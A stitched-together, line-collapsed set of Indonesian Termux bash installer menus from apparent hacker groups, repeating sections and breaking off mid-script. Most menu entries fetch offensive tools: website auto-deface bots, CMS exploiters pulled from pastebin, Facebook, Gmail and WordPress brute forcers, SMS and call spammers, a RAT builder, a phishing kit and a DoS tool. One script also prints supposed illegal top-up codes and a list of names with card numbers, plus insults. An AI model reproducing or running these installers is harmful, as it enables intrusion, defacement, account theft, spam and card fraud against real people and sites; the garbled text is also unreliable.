echo -e $green" installing katoolin " sleep 1 apt update && apt upgrade pkg install git pkg install python2 pkg install gnupg pkg install nano git clone https://github.com/LionSec/katoolin.git cd ~/katoolin echo -e $green"note : nano katoolin.py ganti semua kode /etc/apt/source.list dengan /data/data/com.termux/files/usr/etc/apt/sources.list kemudian simpan dengan menekan ctrl O enter kemudian ctrl X . jika tidak ada menu ctrl pada keyboard munculkan dengan menahan tombol volume atas kemudian ketik Q pada keyboard maka menu ctrl akan muncul di atas keyboard python2 katoolin.py Sisanya bisa mengikuti cara install di atas, Jika menemui masalah gpg error saat melakukan add repository install gnupg-curl dengan perintah pkg install gnupg-curl Untuk yg menggunakan termux dengan cpu arm64 (aarch64) tidak bisa menambahkan repositori kali linux karna kali linux tidak support aarch64, jadi sebelum menginstall tools kali di termux wajib dengan android dengan arm32 jika arm64 gunakan gnuroot" echo -e $red" Done Install Cuk " fi if [ $act = 28 ] || [ $act = 28 ] then clear echo -e $green" installing arch linux " sleep 1 apt update && apt upgrade apt-get install git cd ~/ git clone https://github.com/sdrausty/termux-archlinux.git cd termux-archlinux chmod +x setupTermuxArch.sh ./setupTermuxArch.sh echo -e $red" Done Install Cuk " fi if [ $act = 29 ] || [ $act = 29 ] then clear echo -e $green" installing fedora " sleep 1 apt update && apt upgrade apt-get install git apt install wget git clone https://github.com/nmilosev/termux-fedora.git cd termux-fedora chmod +x termux-fedora.sh echo -e $red" Done Install Cuk " fi if [ $act = 30 ] || [ $act = 30 ] then clear echo -e $green" installing hash-Buster " sleep 1 apt update && apt upgrade apt install python2 && apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster echo -e $red" Done Install Cuk " fi if [ $act = 31 ] || [ $act = 31 ] then clear echo -e $green" installing sudo " sleep 1 apt update && apt upgrade pkg install git ncurses-utils git clone https://github.com/st42/termux-sudo.git cd termux-sudo cat sudo > /data/data/com.termux/files/usr/bin/sudo chmod 700 /data/data/com.termux/files/usr/bin/sudo echo -e $red" Done Install Cuk " fi if [ $act = 32 ] || [ $act = 32 ] then clear echo -e $green" installing aircrack-ng " sleep 1 apt-get update && apt-get upgrade apt-get install aircrack-ng echo -e $red" done install cuk " fi if [ $act = 33 ] || [ $act = 33 ] then clear echo -e $green" installing joomscan " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install perl git clone https://github.com/rezasp/joomscan.git echo -e $red" done install cuk " fi if [ $act = 34 ] || [ $act = 34 ] then clear echo -e $green" installing bing-ip2hosts " sleep 1 apt-get update && apt-get upgrade apt-get install wget wget http://www.morningstarsecurity.com/downloads/bing-ip2hosts-0.4.tar.gz && tar -xzvf bing-ip2hosts-0.4.tar.gz && cp bing-ip2hosts-0.4/bing-ip2hosts /usr/local/bin/t echo -e $red" done install cuk " fi if [ $act = 35 ] || [ $act = 35 ] then clear echo -e $green" installing BlueMaho " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone git://git.kali.org/packages/bluemaho.git echo -e $red" done install cuk " fi if [ $act = 36 ] || [ $act = 36 ] then clear echo -e $green" installing Bluepot " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone git://git.kali.org/packages/bluepot.git echo -e $red" done install cuk " fi if [ $act = 37 ] || [ $act = 37 ] then clear echo -e $green" installing honeypot " sleep 1 apt-get update && apt-get upgrade apt-get install git && apt-get install php git clone https://github.com/whackashoe/php-spam-mail-honeypot.git echo -e $red" done install cuk " fi if [ $act = 38 ] || [ $act = 38 ] then clear echo -e $green" installing bot auto deface 1 " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install wget apt-get install perl apt-get install unzip git clone https://github.com/mrcakil/bot.git cd bot unzip bot.zip cd xploit chmod 777 bot.pl echo -e $red" Lokasi bot ? /bot/xploit/bot.pl" echo -e $red" done install cuk " fi if [ $act = 39 ] || [ $act = 39 ] then clear echo -e $green" installing bot auto deface 2 " sleep 1 apt-get update && apt-get upgrade apt-get install git && apt-get install perl git clone https://github.com/Moham3dRiahi/XAttacker cd XAttacker chmod 777 XAttacker.pl echo -e $red" done install cuk " fi if [ $act = 40 ] || [ $act = 40 ] then clear echo -e $green" installing mailer-sender " sleep 1 apt-get update && apt-get upgrade apt-get install php5-cli curl -sS https://getcomposer.org/installer | php chmod +x composer.phar sudo mv composer.phar /usr/bin/composer git clone https://github.com/pedro-stanaka/mailer-cli.git echo -e $red" note !! " echo -e $red" usage php sendmail.php notification:mailer <email> <subject> <body>; " echo -e $red" or " echo -e $red" php sendmail.php --help " echo -e $red" done install cuk " fi if [ $act = 41 ] || [ $act = 41 ] then clear echo -e $green" installing wordpress brute force " sleep 1 apt-get update && apt-get upgrade apt-get install python2 pip install request git clone https://github.com/atarantini/wpbf echo -e $red" done install cuk " fi if [ $act = 42 ] || [ $act = 42 ] then clear echo -e $green" installing termux Ohmyzsh " sleep 1 apt-get update && apt-get upgrade sh -c "$(curl -fsSL https://github.com/Cabbagec/termux-ohmyzsh/raw/master/install.sh)" ~/.termux/colors.sh echo -e $red" ganti color ? ketik ~/.termux/colors.sh " echo -e $red" Done Install Cuk " fi if [ $act = 43 ] || [ $act = 43 ] then clear echo -e $green" installing Instabot instagram bot " sleep 1 apt-get update && apt-get upgrade pkg install python2 apt-get install git apt-get install nano git clone https://github.com/instabot-py/instabot.py echo -e $red" Done Install Cuk " echo -e $red" Please wait... " echo -e $red" Please wait... " sleep 1 cd instabot.py echo -e $red" ketik nano example.py " echo -e $red" masukan username dan password mu" echo -e $red" Done cuk " fi if [ $act = 44 ] || [ $act = 44 ] then clear echo -e $green" installing fsociety " sleep 1 apt-get update && apt-get upgrade pkg install python apt-get install git git clone https://github.com/Manisso/fsociety echo -e $red" Done Install Cuk " echo -e $red" Please wait... " echo -e $red" Please wait... " sleep 1 cd fsociety echo -e $red" python fsociety.py " fi if [ $act = 45 ] || [ $act = 45 ] then clear echo -e $green" installing CMS Scanner " sleep 1 apt-get update && apt-get upgrade pkg install python apt-get install git git clone https://github.com/Dionach/CMSmap.git sleep 1 cd CMSmap echo -e $red" Usage: cmsmap.py -t <URL> " fi if [ $act = 46 ] || [ $act = 46 ] then clear echo -e $green" installing INFORMATION Gathering " sleep 1 apt-get update && apt-get upgrade pkg install python apt-get install git git clone https://github.com/m4ll0k/Infoga.git infoga sleep 1 cd infoga pip install -r req echo -e $red" Usage: python infoga.py " fi if [ $act = 47 ] || [ $act = 47 ] then clear echo -e $green" installing com fabrik exploiter " sleep 1 apt-get update && apt-get upgrade apt-get install wget apt-get install php wget https://pastebin.com/raw/LDvFvtUD -O com_fabrik.php sleep 1 echo -e $red" Usage: php com_fabrik.php target.txt " fi if [ $act = 48 ] || [ $act = 48 ] then clear echo -e $green" installing com foxcontact exploiter " sleep 1 apt-get update && apt-get upgrade apt-get install wget apt-get install php wget https://pastebin.com/raw/EAtSir5V -O com_foxcontact.php sleep 1 echo -e $red" Usage: php com_foxcontact.php target.txt " fi if [ $act = 49 ] || [ $act = 49 ] then clear echo -e $green" installing gmail brute force " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone https://github.com/JamesAndresCM/Brute_force_gmail sleep 1 echo -e $red" Usage: python2.7 brute_force_gmail.py example@gmail.com PATH_TO_DICTIONARY " fi if [ $act = 50 ] || [ $act = 50 ] then clear echo -e $green" installing ezsploit " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone https://github.com/rand0m1ze/ezsploit sleep 1 echo -e $red" Done Install cuk " fi if [ $act = 51 ] || [ $act = 51 ] then clear echo -e $green" installing spammer grab " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install python2 pip install requests git clone https://github.com/p4kl0nc4t/Spammer-Grab/ sleep 1 echo -e $red" Done Install cuk " fi if [ $act = 52 ] || [ $act = 52 ] then clear echo -e $green" installing spammer toko pedia " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install unzip apt-get install php git clone https://github.com/mrcakil/spam cd spam unzip toko-pedia.zip sleep 1 echo -e $red" Done Install cuk " fi if [ $act = 53 ] || [ $act = 53 ] then clear echo -e $green" installing TheFatRat " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone https://github.com/Screetsec/TheFatRat.git cd TheFatRat chmod +x setup.sh && ./setup.sh sleep 1 echo -e $red" Done Install cuk " fi if [ $act = 54 ] || [ $act = 54 ] then clear echo -e $green" installing IPGeolocation " sleep 1 apt-get update && apt-get upgrade apt-get install git apt install python2 git clone https://github.com/maldevel/IPGeolocation.git cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt sleep 1 echo -e $red" pun Install cuk " fi if [ $act = 55 ] || [ $act = 55 ] then echo -e $green" pesan terakhir " sleep 1 echo -e $green" dadi wong jowo " sleep 1 echo -e $green" kudu jawani " sleep 1 echo -e $green" Please Wait.... " sleep 1 echo -e $green" contact : mr.60-n3z dark line.net " sleep 1 echo -e $red" web : https://clannokturnal.blogspot.com " sleep 1 echo -e $red" Bye ea :* " sleep 1 exit fi
mrdrag1
#!/system/xbin/bash # Bersihkan Layar clear blue='\033[34;1m' green='\033[32;1m' purple='\033[35;1m' cyan='\033[36;1m' red='\033[31;1m' white='\033[37;1m' yellow='\033[33;1m' ################################################### # MR. DRAG Tamvan ################################################### trap ctrl_c INT ctrl_c() { clear echo $red"[#]> (Ctrl + C ) Detected, Trying To Exit ... " sleep 1 echo "" echo $yellow"[#]> Thank You For Using My Tools ... " sleep 1 echo "" echo $white"[#]> BlackHat Hacker Indonesia Was Here ... " read enter exit } ================================================= echo $white"Author : MR. DRAG And MR.JACK " echo $white"Team : ALI ATTACKER" echo $white"Thanks To :Mr. Cl4Y | Kandol | Mr. Sat24 | Mr. Khintil | Mr. 5ton3 | Its_iCn | Inyours3rv3r | Tu4n N1cn4m4 | Cy#B3root | Mr. Rm19 | Anarki_420 | Hmei7 | Bh3not | Mr. Kapra| AW4K3" echo $white"Thanks To :Intect" echo $white"thanks To : W3LL Squad Offical" echo $white"thanks To : Sora Cyber Team" echo $white"thanks To : Blackhat Hacker Indonesia" echo $white"thanks To : RABIT CYBER TEAM" echo $white"thanks To : Curut Cyber Team " echo $white"thanks To: Indonesia Hacker Rules" echo $white"thanks to: Jakarta Cyber Army" ================================================= echo $yellow" 01) Red Hawk" echo $yellow" 02) D-Tect" echo $yellow" 03) Top Up Ilegal ML" echo $yellow" 04) Top Up Ilegal FF" echo $yellow" 05) Webdav" echo $yellow" 06) Metasploit" echo $yellow" 07) Pulsa Gratis" echo $yellow" 08) Ubuntu" echo $yellow" 09) Youtube Dl" echo $yellow" 10) viSQL " echo $yellow" 11) multi-brute-webdav " echo $yellow" 12) Bajinganv6 " echo $yellow" 13) Tools RCT" echo $yellow" 14) cc fresh Amazon Dan Untung Carding" echo $red" 15) Exit " echo $white"" read -p "[Mr.DRAG]> " bro; if [ $bro = 1 ] || [ $bro = 01 ] then clear echo $red" Installing Red Hawk " sleep 1 apt update && apt upgrade apt install php apt install git git clone https://github.com/Tuhinshubhra/RED_HAWK echo $red" T E R I N S T A L L " exit fi if [ $bro = 2 ] || [ $bro = 02 ] then clear echo $red" Installing D-Tect " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install python2 git clone https://github.com/shawarkhanethicalhacker/D-TECT echo $red" T E R I N S T A L L " exit fi if [ $bro = 3 ] || [ $bro = 03 ] then clear echo $red" TOP UP ILEGAL ML " sleep 1 echo $white " Kode :5448adq35 | Kode 5644864y36 | Kode : 3158art6455 | Kode : 90426dka656 | Kode : 6456745hkw54 | Kode :2642x655843 " echo $red" Masukin Kode Itu Ke Top Up Kalian ^_^" exit fi if [ $bro = 4 ] || [ $bro = 04 ] then clear echo $red" TOP UP ILEGAL FF " sleep 1 echo $white" Kode 5458453pr9 |Kode :260446i5m4 |Kode : 9705465d54 | Kode : 3455b623 | Kode : 84238y548 | Kode 862158t3944" echo $red" Masukin Kode Itu Ke Top Up Kalian ^_^" exit fi if [ $bro = 5 ] || [ $bro = 05 ] then clear echo $red" Installing Webdav " sleep 1 apt update && apt upgrade apt install python2 pip2 install urllib3 chardet certifi idna requests apt install openssl curl pkg install libcurl mkdir webdav cd ~/webdav wget https://pastebin.com/raw/HnVyQPtR -O webdav.py chmod 777 webdav.py cd ~/ echo $red" T E R I N S T A L L " exit fi if [ $bro = 06 ] || [ $bro = 6 ] then clear echo $red" Installing Metasploit " sleep 1 apt update && apt upgrade apt install git apt install wget wget https://raw.githubusercontent.com/verluchie/termux-metasploit/master/install.sh chmod 777 install.sh sh install.sh echo $red" T E R I N S T A L L " exit fi if [ $bro = 07 ] || [ $bro = 7 ] then clear echo $red" PULSA GRATIS " sleep 1 echo $white" Inviet Kode :2bk340dk94 | Inviet Kode 154d955b9 |Inviet Kode : 9p54k644as5 | Inviet Kode 844ipps456 | Inviet Kode : 5qdk548239 | Inviet Kode :19ip9405" echo $red" Masukin Kode Itu Ke Rendemm Pulsa Kalian ^_^" exit fi if [ $bro = 08 ] || [ $bro = 8 ] then clear echo $red" Installing Ubuntu " sleep 1 apt update && apt upgrade apt install git apt install wget apt install proot git clone https://github.com/Neo-Oli/termux-ubuntu.git cd ~/termux-ubuntu chmod +x ubuntu.sh sh ubuntu.sh echo " Fix network please wait " sleep 1 echo "nameserver 8.8.8.8" >/data/data/com.termux/files/home/termux-ubuntu/ubuntu-fs/etc/$ echo $red" T E R I N S T A L L " exit fi if [ $bro = 09 ] || [ $bro = 9 ] then clear echo $red" Installing Youtube DL " sleep 1 apt update && apt upgrade apt install python pip3 install mps_youtube pip3 install youtube_dl apt install mpv echo " Untuk menjalankannya ketik "mpsyt" tanpa tanda petik " echo $red" T E R I N S T A L L " exit fi if [ $bro = 10 ] || [ $bro = 10 ] then clear echo $red" Installing viSQL " sleep 1 apt update && apt upgrade pkg install git pkg install python2 git clone https://github.com/blackvkng/viSQL.git cd ~/viSQL chmod 777 viSQL.py cd ~/ echo $red" T E R I N S T A L L " exit fi if [ $bro = 11 ] || [ $bro = 11 ] then clear echo $red" Installing Multi-Brute-Webdav " apt update && apt upgrade pkg install toilet pkg install sh pkg install git git clone https://github.com/INYOURS3RV3R/Multi-Brute-Webdav cd ~/Multi-Brute-Webdav echo $red" T E R I N S T A L L " exit fi if [ $bro = 12 ] || [ $bro = 12 ] then clear echo $red"installing bajinganv6" pkg install php pkg install figlet pkg install python2 pip2 install requests pip2 install termcolor git clone https://github.com/DarknessCyberTeam/BAJINGANv6.git cd ~/BAJINGANv6 echo $red" T E R I N S T A L L " exit fi if [ $bro = 13 ] || [ $bro = 13 ] then clear echo $red"installing tools RCT" apt update && apt upgrade pkg install git git clone https://github.com/RabCT/rct cd ~/rct chmod +x rct echo $red" T E R I N S T A L L " exit fi if [ $bro = 14 ] || [ $bro = 14 ] then clear echo $red" Tobat Anjing Jangan Carding Trus Kasian Orang Tua Lu" sleep 1 echo $white" Name:Lita |Number Card : 2748074115574 Exp 2-2024 | Name : Dio |Number Card : 1264460632468 Exp -9-2021 | Name :Zaki |Number Card :541687450045 Exp : 4-2019 |Name : Panca |Number Card : 980412158457 Exp -8-2023 | Name : Rio | Number Card : 29045625807524 Exp -9 - 2020 | Name : Jessica | Number Card : 15507611507459 Exp -1 - 2024 | Name : Gilang | Number Card : 6878541334804 Exp -9-2026 |Name : Tia |Number Card :2087468412546 Exp -3-2021" echo $red" Bila Ingin Lebih Lanjut Tunggu Peng Update an Selanjut nya" exit fi if [ $bro = 15 ] || [ $bro = 15 ] then echo " Thanks To BlackHat Hacker Indonesia " sleep 1 echo " Mr. Drag was Here " sleep 1 echo " Bay-Bay " sleep 1 echo " Para Hacker" sleep 1 echo " Jangan Lupa Colii Yahh " sleep 1 echo " Semoga Lu Besok Mati ea Budjank" sleep 1 exit fi
mamahsayang
#!/data/data/com.termux/files/usr/bin/bash # DIAN HERMAWAN # coded By MASTER HACKER # copyright® 2019 # WELCOME blue='\e[0;34' cyan='\e[0;36m' green='\e[0;34m' okegreen='\033[92m' lightgreen='\e[1;32m' white='\e[1;37m' red='\e[1;31m' yellow='\e[1;33m' ################################################### # CTRL C ################################################### trap ctrl_c INT ctrl_c() { clear echo -e $red"[#]> (Ctrl + C ) Detected, Trying To Exit ... " sleep 1 echo "" echo -e $green"[#]> Terima kasih sudah make tools saya ... " sleep 1 echo "" echo -e $white"[#]> Master Here ... " read enter exit } echo -e $red" __ ___ _____ __ _ __" echo -e $red" / |/ /___ / ___/__ _/ /__ (_) /" echo -e $white" / /|_/ / __// /__/ _ / _// / / " echo -e $white" /_/ /_/_/ (_)___/\_,_/_/\_\/_/_/ " echo -e $red" ***********************************************" echo -e $white" # $red toolkit for hackers v2.1 $white #" echo -e $red" # $red happy fun guys $red #" echo -e $white" # $red contact: mrcakil@programmer.net $white #" echo -e $red" # $white greetz :99syndicate - Anonymous Cyber team $red#" echo -e $white" # $white copyright : ./Mr Cakil $white #" echo -e $red" # $white thanks to : 4wsec - Mr.Tenwap $red #" echo -e $white" ***********************************************" echo "" echo -e $green" 01) Red Hawk" echo -e $green" 02) D-Tect" echo -e $green" 03) Hunner" echo -e $green" 04) WPScan" echo -e $green" 05) Webdav" echo -e $green" 06) Metasploit" echo -e $green" 07) Kali Nethunter" echo -e $green" 08) Ubuntu" echo -e $green" 09) Youtube Dl" echo -e $green" 10) viSQL " echo -e $green" 11) Weeman" echo -e $green" 12) WFDroid" echo -e $green" 13) FBBrute" echo -e $green" 14) Ngrok" echo -e $green" 15) Torshammer " echo -e $green" 16) RouterSploit " echo -e $green" 17) Hydra " echo -e $green" 18) Weevely " echo -e $green" 19) SQLMap " echo -e $green" 20) Dirbuster " echo -e $green" 21) admin finder " echo -e $green" 22) lokomedia exploiter " echo -e $green" 23) elfinder exploiter " echo -e $green" 24) magento add admin exploiter " echo -e $green" 25) scanner tools " echo -e $green" 26) bing dorker " echo -e $green" 27) katoolin " echo -e $green" 28) arch linux " echo -e $green" 29) linux fedora" echo -e $green" 30) hash-buster" echo -e $green" 31) sudo" echo -e $green" 32) aircrack-ng" echo -e $green" 33) joomscan" echo -e $green" 34) bing-ip2hosts" echo -e $green" 35) BlueMaho" echo -e $green" 36) Bluepot" echo -e $green" 37) honeypot" echo -e $green" 38) bot auto deface 1" echo -e $green" 39) bot auto deface 2" echo -e $green" 40) mailer sender cli" echo -e $green" 41) Wordpress Brute Force" echo -e $green" 42) Oh-myzsh theme for termux" echo -e $green" 43) instabot (instagram bot)" echo -e $green" 44) fsociety" echo -e $green" 45) Cms Scanner" echo -e $green" 46) Information Gathering" echo -e $green" 47) com_fabrik exploiter" echo -e $green" 48) com foxcontact exploiter" echo -e $green" 49) gmail brute force" echo -e $green" 50) ezsploit" echo -e $green" 51) spammer-grab sms" echo -e $green" 52) spammer call toko-pedia" echo -e $green" 53) The Fat Rat" echo -e $green" 54) IPGeolocation" echo -e $green" 55) exit" echo -e $white"" read -p "[mrcakil@Tools]> " act; if [ $act = 01 ] || [ $act = 01 ] then clear echo -e $green" Installing Red Hawk " sleep 1 apt update && apt upgrade apt install php apt install git git clone https://github.com/Tuhinshubhra/RED_HAWK echo -e $green" Done Install Cuk " fi if [ $act = 02 ] || [ $act = 02 ] then clear echo -e $green" Installing D-Tect " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install python2 git clone https://github.com/shawarkhanethicalhacker/D-TECT echo -e $red" Done Install Cuk " fi if [ $act = 03 ] || [ $act = 03 ] then clear echo -e $green" Installing Hunner " sleep 1 apt-get update && apt-get upgrade apt install python apt install git git clone https://github.com/b3-v3r/Hunner echo -e $red" Done Install Cuk " fi if [ $act = 04 ] || [ $act = 04 ] then clear echo -e $green" Installing Wpscan " sleep 1 apt-get update && apt-get upgrade apt install ruby apt install curl apt install git git clone https://github.com/wpscanteam/wpscan cd ~/wpscan gem install bundle bundle config build.nokogiri --use-system-libraries bundle install ruby wpscan.rb --update cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 05 ] || [ $act = 05 ] then clear echo -e $green" Installing Webdav " sleep 1 apt update && apt upgrade apt install python2 pip2 install urllib3 chardet certifi idna requests apt install openssl curl pkg install libcurl mkdir webdav cd ~/webdav wget https://pastebin.com/raw/HnVyQPtR -O webdav.py chmod 777 webdav.py cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 06 ] || [ $act = 06 ] then clear echo -e $green" Installing Metasploit " sleep 1 apt update && apt upgrade apt install git apt install wget wget https://raw.githubusercontent.com/verluchie/termux-metasploit/master/install.sh chmod 777 install.sh sh install.sh echo -e $red" Done Install Cuk " fi if [ $act = 07 ] || [ $act = 07 ] then clear echo -e $green" Installing Kali Nethunter " sleep 1 apt update && apt upgrade apt install git git clone https://github.com/Hax4us/Nethunter-In-Termux.git cd ~/Nethunter-In-Termux chmod 777 kalinethunter sh kalinethunter echo -e $red" Done Install Cuk " fi if [ $act = 08 ] || [ $act = 08 ] then clear echo -e $green" Installing Ubuntu " sleep 1 apt update && apt upgrade apt install git apt install wget apt install proot git clone https://github.com/Neo-Oli/termux-ubuntu.git cd ~/termux-ubuntu chmod +x ubuntu.sh sh ubuntu.sh echo " Fix network please wait " sleep 1 echo "nameserver 8.8.8.8" > /data/data/com.termux/files/home/termux-ubuntu/ubuntu-fs/etc/resolv.conf echo -e $red" Done Install Cuk " fi if [ $act = 09 ] || [ $act = 09 ] then clear echo -e $green" Installing Youtube DL " sleep 1 apt update && apt upgrade apt install python pip3 install mps_youtube pip3 install youtube_dl apt install mpv echo " Untuk menjalankannya ketik "mpsyt" tanpa tanda petik " echo -e $red" Done Install Cuk " fi if [ $act = 10 ] || [ $act = 10 ] then clear echo -e $green" Installing viSQL " sleep 1 apt update && apt upgrade pkg install git pkg install python2 git clone https://github.com/blackvkng/viSQL.git cd ~/viSQL chmod 777 viSQL.py cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 11 ] || [ $act = 11 ] then clear echo -e $green" Installing Weeman " sleep 1 apt update && apt upgrade pkg install git apt install python2 git clone https://github.com/samyoyo/weeman cd ~/weeman pip2 install beautifulsoup pip2 install bs4 cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 12 ] || [ $act = 12 ] then clear echo -e $green" Installing WFDroid " sleep 1 apt update && apt upgrade apt install wget mkdir wfdroid cd ~/wfdroid wget https://raw.githubusercontent.com/bytezcrew/wfdroid-termux/master/wfdinstall chmod 777 wfdinstall sh wfdinstall cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 13 ] || [ $act = 13 ] then clear sleep 1 echo -e $green" Installing FBBrute " apt install python2 apt install python2-dev apt install wget pip2 install mechanize mkdir fbbrute cd ~/fbbrute wget https://pastebin.com/raw/aqMBt2xA -O fbbrute.py wget http://override.waper.co/files/password.apk mv password.apk password.txt chmod 777 fbbrute.py cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 14 ] || [ $act = 14 ] then clear echo -e $green" Installing Ngrok " sleep 1 apt install wget mkdir ngrok cd ~/ngrok wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip unzip ngrok-stable-linux-arm.zip cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 15 ] || [ $act = 15 ] then clear echo -e $green" Installing Hammer " sleep 1 pkg update pkg upgrade pkg install python pkg install git git clone https://github.com/cyweb/hammer cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 16 ] || [ $act = 16 ] then clear echo -e $green" Installing Routersploit " sleep 1 apt install git apt install python2 pip2 install requests git clone https://github.com/reverse-shell/routersploit.git cd routersploit pip install -r requirements.txt termux-fix-shebang rsf.py cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 17 ] || [ $act = 17 ] then clear echo -e $green" Installing Hydra " sleep 1 apt update && apt install -y wget apt install hydra wget http://scrapmaker.com/download/data/wordlists/dictionaries/rockyou.txt cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 18 ] || [ $act = 18 ] then clear echo -e $green" Installing Weevely " sleep 1 pkg update pkg upgrade git clone https://github.com/glides/Weevely cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 19 ] || [ $act = 19 ] then clear echo -e $green" Installing SQLMap " sleep 1 apt update && apt upgrade apt install python2 git clone https://github.com/sqlmapproject/sqlmap.git cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 20 ] || [ $act = 20 ] then clear echo -e $green" Installing Dirbuster " sleep 1 apt-get update apt-get install python apt-get install git git clone https://github.com/maurosoria/dirsearch.git cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 21 ] || [ $act = 21 ] then clear echo -e $green" Installing admin finder " sleep 1 apt update && apt upgrade apt-get install php mkdir adfin cd ~/webdav wget https://pastebin.com/raw/32txZ6Qr -O adfin.php cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 22 ] || [ $act = 22 ] then clear echo -e $green" installing lokomedia exploiter " sleep 1 apt update && apt upgrade apt-get install php mkdir lokomed cd ~/lokomed wget https://pastebin.com/raw/sPpJRjCZ -O lokomedia.php cd ~/ echo -e $red" Done Install Cuk " echo -e $red" usage : php lokomedia.php a.txt " fi if [ $act = 23 ] || [ $act = 23 ] then clear echo -e $green" installing elfinder exploiter " sleep 1 apt update && apt upgrade apt-get install php mkdir elfinder cd ~/elfinder wget https://pastebin.com/raw/S7Y2V19h -O elfinder.php cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 24 ] || [ $act = 24 ] then clear echo -e $green" installing magento add admin exploiter " sleep 1 apt update && apt upgrade apt-get install php mkdir magento cd ~/magento wget https://pastebin.com/raw/PXkG73pG -O magento.php cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 25 ] || [ $act = 25 ] then clear echo -e $green" installing scanner tools " sleep 1 apt update && apt upgrade apt install python2 mkdir scanner cd ~/scanner wget https://pastebin.com/raw/m79t1Zia -O scanner.py wget https://pastebin.com/raw/mgKxMWXh -O admins.1337 wget https://pastebin.com/raw/EafKj98D -O files.1337 cd ~/ echo -e $red" Done Install Cuk " echo -e $red" usage : python2 scanner.py site.com -m files " fi if [ $act = 26 ] || [ $act = 26 ] then clear echo -e $green" installing bing dorker " sleep 1 apt update && apt upgrade apt-get install php mkdir bing cd ~/bing wget https://pastebin.com/raw/tjQY6Tsg -O dorker.php cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 27 ] || [ $act = 27 ] then clear echo -e $green" installing katoolin " sleep 1 apt update && apt upgrade pkg install git pkg install python2 pkg install gnupg pkg install nano git clone https://github.com/LionSec/katoolin.git cd ~/katoolin echo -e $green"note : nano katoolin.py ganti semua kode /etc/apt/source.list dengan /data/data/com.termux/files/usr/etc/apt/sources.list kemudian simpan dengan menekan ctrl O enter kemudian ctrl X . jika tidak ada menu ctrl pada keyboard munculkan dengan menahan tombol volume atas kemudian ketik Q pada keyboard maka menu ctrl akan muncul di atas keyboard python2 katoolin.py Sisanya bisa mengikuti cara install di atas, Jika menemui masalah gpg error saat melakukan add repository install gnupg-curl dengan perintah pkg install gnupg-curl Untuk yg menggunakan termux dengan cpu arm64 (aarch64) tidak bisa menambahkan repositori kali linux karna kali linux tidak support aarch64, jadi sebelum menginstall tools kali di termux wajib dengan android dengan arm32 jika arm64 gunakan gnuroot" echo -e $red" Done Install Cuk " fi if [ $act = 28 ] || [ $act = 28 ] then clear echo -e $green" installing arch linux " sleep 1 apt update && apt upgrade apt-get install git cd ~/ git clone https://github.com/sdrausty/termux-archlinux.git cd termux-archlinux chmod +x setupTermuxArch.sh ./setupTermuxArch.sh echo -e $red" Done Install Cuk " fi if [ $act = 29 ] || [ $act = 29 ] then clear echo -e $green" installing fedora " sleep 1 apt update && apt upgrade apt-get install git apt install wget git clone https://github.com/nmilosev/termux-fedora.git cd termux-fedora chmod +x termux-fedora.sh echo -e $red" Done Install Cuk " fi if [ $act = 30 ] || [ $act = 30 ] then clear echo -e $green" installing hash-Buster " sleep 1 apt update && apt upgrade apt install python2 && apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster echo -e $red" Done Install Cuk " fi if [ $act = 31 ] || [ $act = 31 ] then clear echo -e $green" installing sudo " sleep 1 apt update && apt upgrade pkg install git ncurses-utils git clone https://github.com/st42/termux-sudo.git cd termux-sudo cat sudo > /data/data/com.termux/files/usr/bin/sudo chmod 700 /data/data/com.termux/files/usr/bin/sudo echo -e $red" Done Install Cuk " fi if [ $act = 32 ] || [ $act = 32 ] then clear echo -e $green" installing aircrack-ng " sleep 1 apt-get update && apt-get upgrade apt-get install aircrack-ng echo -e $red" done install cuk " fi if [ $act = 33 ] || [ $act = 33 ] then clear echo -e $green" installing joomscan " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install perl git clone https://github.com/rezasp/joomscan.git echo -e $red" done install cuk " fi if [ $act = 34 ] || [ $act = 34 ] then clear echo -e $green" installing bing-ip2hosts " sleep 1 apt-get update && apt-get upgrade apt-get install wget wget http://www.morningstarsecurity.com/downloads/bing-ip2hosts-0.4.tar.gz && tar -xzvf bing-ip2hosts-0.4.tar.gz && cp bing-ip2hosts-0.4/bing-ip2hosts /usr/local/bin/t echo -e $red" done install cuk " fi if [ $act = 35 ] || [ $act = 35 ] then clear echo -e $green" installing BlueMaho " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone git://git.kali.org/packages/bluemaho.git echo -e $red" done install cuk " fi if [ $act = 36 ] || [ $act = 36 ] then clear echo -e $green" installing Bluepot " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone git://git.kali.org/packages/bluepot.git echo -e $red" done install cuk " fi if [ $act = 37 ] || [ $act = 37 ] then clear echo -e $green" installing honeypot " sleep 1 apt-get update && apt-get upgrade apt-get install git && apt-get install php git clone https://github.com/whackashoe/php-spam-mail-honeypot.git echo -e $red" done install cuk " fi if [ $act = 38 ] || [ $act = 38 ] then clear echo -e $green" installing bot auto deface 1 " sleep 1 apt-get update && apt-get upgrade 